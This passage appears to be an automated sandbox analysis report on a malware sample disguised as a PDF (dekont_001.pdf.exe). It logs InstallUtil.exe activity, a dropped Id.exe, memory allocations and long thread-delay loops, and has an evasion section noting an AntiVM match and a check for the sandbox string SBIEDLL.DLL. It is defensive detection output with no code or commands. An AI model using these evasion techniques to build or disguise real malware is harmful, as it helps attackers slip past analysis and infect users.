Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 2188, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: dekont_001.pdf.exe, 00000000.00000002.1761092855.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Memory allocated: 1180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Memory allocated: 4E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Memory allocated: 15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Memory allocated: 2F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Memory allocated: 4F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598354	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598247	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596323	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595007	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594503	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594356	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594034	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593909	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Window / User API: threadDelayed 7782	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Window / User API: threadDelayed 2064	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7506	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2338	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Window / User API: threadDelayed 2159	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Window / User API: threadDelayed 4329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7526	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2286	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 5480	Thread sleep count: 7782 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 5480	Thread sleep count: 2064 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -99016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -98797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -98469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -98333s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -98218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97967s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97858s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97309s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -97094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -96078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -95969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -95844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -95734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -95566s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -95438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -95313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -95188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -95078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -94969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -94844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -94734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe TID: 7068	Thread sleep time: -94625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -38738162554790034s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1880	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5596	Thread sleep count: 7506 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5596	Thread sleep count: 2338 > 30	Jump to behavior
